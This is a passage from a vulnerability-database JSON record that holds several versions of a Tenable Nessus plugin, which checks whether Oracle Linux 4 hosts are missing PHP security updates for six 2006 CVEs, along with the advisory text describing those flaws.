"ORACLELINUX_ELSA-2006-0730.NASL", "lastseen": "2017-10-29T13:42:42", "modified": "2013-07-14T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "67421", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2006-November/000016.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisories ELSA-2006-0730 / \n# ELSA-2006-0669.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67421);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/07/14 23:36:28 $\");\n\n script_cve_id(\"CVE-2006-3016\", \"CVE-2006-4020\", \"CVE-2006-4482\", \"CVE-2006-4484\", \"CVE-2006-4486\", \"CVE-2006-5465\");\n script_osvdb_id(25253, 27824, 28001, 28002, 28003, 28004, 30178, 30179);\n script_xref(name:\"RHSA\", value:\"2006:0669\");\n script_xref(name:\"RHSA\", value:\"2006:0730\");\n\n script_name(english:\"Oracle Linux 4 : php (ELSA-2006-0730 / ELSA-2006-0669)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix a security issue are now available. \n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team. \n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server. \n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues. These packages also contain\na fix for a bug where certain input strings to the metaphone() function\ncould cause memory corruption. \n\n\nFrom Red Hat Security Advisory 2006:0730 :\n\nThe Hardened-PHP Project discovered an overflow in the PHP\nhtmlentities() and htmlspecialchars() routines. If a PHP script used\nthe vulnerable functions to parse UTF-8 data, a remote attacker\nsending a carefully crafted request could trigger the overflow and\npotentially execute arbitrary code as the 'apache' user.\n(CVE-2006-5465)\n\n\nFrom Red Hat Security Advisory 2006:0669 :\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier\nto be used, a cross-site-scripting or response-splitting attack could\nbe possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a\nscript used the sscanf() function with positional arguments in the\nformat string, a remote attacker sending a carefully crafted request\ncould execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and\nstr_repeat() functions. If a script running on a 64-bit server used\neither of these functions on untrusted user data, a remote attacker\nsending a carefully crafted request might be able to cause a heap\noverflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script\nwas set up to process GIF images from untrusted sources using the gd\nextension, a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation\nhandling. On 64-bit platforms, the 'memory_limit' setting was not\nenforced correctly, which could allow a denial of service attack by a\nremote user. (CVE-2006-4486)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2006-November/000016.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-devel-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-devel-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-domxml-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-domxml-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-gd-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-gd-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-imap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-imap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ldap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ldap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mbstring-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mbstring-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mysql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mysql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ncurses-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ncurses-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-odbc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-odbc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pear-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pear-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pgsql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-snmp-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-snmp-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-xmlrpc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-xmlrpc-4.3.9-3.22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n\n", "title": "Oracle Linux 4 : php (ELSA-2006-0730 / ELSA-2006-0669)", "type": "nessus", "viewCount": 5}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:42:42"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:linux:php-ldap", "p-cpe:/a:oracle:linux:php-domxml", "p-cpe:/a:oracle:linux:php-devel", "p-cpe:/a:oracle:linux:php-imap", "p-cpe:/a:oracle:linux:php-mbstring", "p-cpe:/a:oracle:linux:php-ncurses", "p-cpe:/a:oracle:linux:php-snmp", "p-cpe:/a:oracle:linux:php", "p-cpe:/a:oracle:linux:php-gd", "p-cpe:/a:oracle:linux:php-mysql", "p-cpe:/a:oracle:linux:php-xmlrpc", "p-cpe:/a:oracle:linux:php-pear", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:php-odbc", "p-cpe:/a:oracle:linux:php-pgsql"], "cvelist": ["CVE-2006-4486", "CVE-2006-4484", "CVE-2006-4020", "CVE-2006-3016", "CVE-2006-4482", "CVE-2006-5465"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated PHP packages that fix a security issue are now available. \n\nThis update has been rated as having important security impact by the Red Hat Security Response Team. \n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. \n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues. These packages also contain a fix for a bug where certain input strings to the metaphone() function could cause memory corruption. \n\n\nFrom Red Hat Security Advisory 2006:0730 :\n\nThe Hardened-PHP Project discovered an overflow in the PHP htmlentities() and htmlspecialchars() routines. If a PHP script used the vulnerable functions to parse UTF-8 data, a remote attacker sending a carefully crafted request could trigger the overflow and potentially execute arbitrary code as the 'apache' user.\n(CVE-2006-5465)\n\n\nFrom Red Hat Security Advisory 2006:0669 :\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier to be used, a cross-site-scripting or response-splitting attack could be possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a script used the sscanf() function with positional arguments in the format string, a remote attacker sending a carefully crafted request could execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and str_repeat() functions. If a script running on a 64-bit server used either of these functions on untrusted user data, a remote attacker sending a carefully crafted request might be able to cause a heap overflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script was set up to process GIF images from untrusted sources using the gd extension, a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation handling. On 64-bit platforms, the 'memory_limit' setting was not enforced correctly, which could allow a denial of service attack by a remote user. (CVE-2006-4486)", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "62ba70ccc6f7d9996206036562c2c55f6150be77cbf377a1e93711e3e4c8552f", "hashmap": [{"hash": "5e129de1471424c1b785db5398b6e034", "key": "sourceData"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "a3df1211c7b4f8002f729fdec6b65ba4", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "c52c842077cf089d22f0664713131fe8", "key": "references"}, {"hash": "296976f54ebc7ab6844139efdf1ee500", "key": "title"}, {"hash": "b2bcd21dea5c25f09b234688651791fd", "key": "description"}, {"hash": "c5b9315a071dc031333e754a6c18b197", "key": "href"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "afe48c3fc64f3dcf0944ff6536c43c36", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "ca3712ddee1ac1e48e7d8a157ac26179", "key": "pluginID"}, {"hash": "1865261413c3db59730e6f4c15d45b87", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=67421", "id": "ORACLELINUX_ELSA-2006-0730.NASL", "lastseen": "2018-08-15T15:35:51", "modified": "2018-08-13T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "67421", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2006-November/000016.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisories ELSA-2006-0730 / \n# ELSA-2006-0669.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67421);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/08/13 14:32:36\");\n\n script_cve_id(\"CVE-2006-3016\", \"CVE-2006-4020\", \"CVE-2006-4482\", \"CVE-2006-4484\", \"CVE-2006-4486\", \"CVE-2006-5465\");\n script_xref(name:\"RHSA\", value:\"2006:0669\");\n script_xref(name:\"RHSA\", value:\"2006:0730\");\n\n script_name(english:\"Oracle Linux 4 : php (ELSA-2006-0730 / ELSA-2006-0669)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix a security issue are now available. \n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team. \n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server. \n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues. These packages also contain\na fix for a bug where certain input strings to the metaphone() function\ncould cause memory corruption. \n\n\nFrom Red Hat Security Advisory 2006:0730 :\n\nThe Hardened-PHP Project discovered an overflow in the PHP\nhtmlentities() and htmlspecialchars() routines. If a PHP script used\nthe vulnerable functions to parse UTF-8 data, a remote attacker\nsending a carefully crafted request could trigger the overflow and\npotentially execute arbitrary code as the 'apache' user.\n(CVE-2006-5465)\n\n\nFrom Red Hat Security Advisory 2006:0669 :\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier\nto be used, a cross-site-scripting or response-splitting attack could\nbe possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a\nscript used the sscanf() function with positional arguments in the\nformat string, a remote attacker sending a carefully crafted request\ncould execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and\nstr_repeat() functions. If a script running on a 64-bit server used\neither of these functions on untrusted user data, a remote attacker\nsending a carefully crafted request might be able to cause a heap\noverflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script\nwas set up to process GIF images from untrusted sources using the gd\nextension, a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation\nhandling. On 64-bit platforms, the 'memory_limit' setting was not\nenforced correctly, which could allow a denial of service attack by a\nremote user. (CVE-2006-4486)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2006-November/000016.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-devel-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-devel-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-domxml-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-domxml-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-gd-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-gd-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-imap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-imap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ldap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ldap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mbstring-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mbstring-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mysql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mysql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ncurses-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ncurses-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-odbc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-odbc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pear-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pear-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pgsql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-snmp-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-snmp-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-xmlrpc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-xmlrpc-4.3.9-3.22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n\n", "title": "Oracle Linux 4 : php (ELSA-2006-0730 / ELSA-2006-0669)", "type": "nessus", "viewCount": 5}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-15T15:35:51"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2006-4486", "CVE-2006-4484", "CVE-2006-4020", "CVE-2006-3016", "CVE-2006-4482", "CVE-2006-5465"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated PHP packages that fix a security issue are now available. \n\nThis update has been rated as having important security impact by the Red Hat Security Response Team. \n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. \n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues. These packages also contain a fix for a bug where certain input strings to the metaphone() function could cause memory corruption. \n\n\nFrom Red Hat Security Advisory 2006:0730 :\n\nThe Hardened-PHP Project discovered an overflow in the PHP htmlentities() and htmlspecialchars() routines. If a PHP script used the vulnerable functions to parse UTF-8 data, a remote attacker sending a carefully crafted request could trigger the overflow and potentially execute arbitrary code as the 'apache' user.\n(CVE-2006-5465)\n\n\nFrom Red Hat Security Advisory 2006:0669 :\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier to be used, a cross-site-scripting or response-splitting attack could be possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a script used the sscanf() function with positional arguments in the format string, a remote attacker sending a carefully crafted request could execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and str_repeat() functions. If a script running on a 64-bit server used either of these functions on untrusted user data, a remote attacker sending a carefully crafted request might be able to cause a heap overflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script was set up to process GIF images from untrusted sources using the gd extension, a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation handling. On 64-bit platforms, the 'memory_limit' setting was not enforced correctly, which could allow a denial of service attack by a remote user. (CVE-2006-4486)", "edition": 1, "enchantments": {}, "hash": "3b046919342db1d9cbe3aa8936aa2e786e4cf429d1bf436b738b2b54fc42903e", "hashmap": [{"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "fc3d18965a454940fdb8027d567959ee", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "c52c842077cf089d22f0664713131fe8", "key": "references"}, {"hash": "296976f54ebc7ab6844139efdf1ee500", "key": "title"}, {"hash": "b2bcd21dea5c25f09b234688651791fd", "key": "description"}, {"hash": "c5b9315a071dc031333e754a6c18b197", "key": "href"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "afe48c3fc64f3dcf0944ff6536c43c36", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "ca3712ddee1ac1e48e7d8a157ac26179", "key": "pluginID"}, {"hash": "8e47d4082bf7f506143b52c07e08b700", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=67421", "id": "ORACLELINUX_ELSA-2006-0730.NASL", "lastseen": "2016-09-26T17:25:52", "modified": "2013-07-14T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.2", "pluginID": "67421", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2006-November/000016.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisories ELSA-2006-0730 / \n# ELSA-2006-0669.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67421);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/07/14 23:36:28 $\");\n\n script_cve_id(\"CVE-2006-3016\", \"CVE-2006-4020\", \"CVE-2006-4482\", \"CVE-2006-4484\", \"CVE-2006-4486\", \"CVE-2006-5465\");\n script_osvdb_id(25253, 27824, 28001, 28002, 28003, 28004, 30178, 30179);\n script_xref(name:\"RHSA\", value:\"2006:0669\");\n script_xref(name:\"RHSA\", value:\"2006:0730\");\n\n script_name(english:\"Oracle Linux 4 : php (ELSA-2006-0730 / ELSA-2006-0669)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix a security issue are now available. \n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team. \n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server. \n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues. These packages also contain\na fix for a bug where certain input strings to the metaphone() function\ncould cause memory corruption. \n\n\nFrom Red Hat Security Advisory 2006:0730 :\n\nThe Hardened-PHP Project discovered an overflow in the PHP\nhtmlentities() and htmlspecialchars() routines. If a PHP script used\nthe vulnerable functions to parse UTF-8 data, a remote attacker\nsending a carefully crafted request could trigger the overflow and\npotentially execute arbitrary code as the 'apache' user.\n(CVE-2006-5465)\n\n\nFrom Red Hat Security Advisory 2006:0669 :\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier\nto be used, a cross-site-scripting or response-splitting attack could\nbe possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a\nscript used the sscanf() function with positional arguments in the\nformat string, a remote attacker sending a carefully crafted request\ncould execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and\nstr_repeat() functions. If a script running on a 64-bit server used\neither of these functions on untrusted user data, a remote attacker\nsending a carefully crafted request might be able to cause a heap\noverflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script\nwas set up to process GIF images from untrusted sources using the gd\nextension, 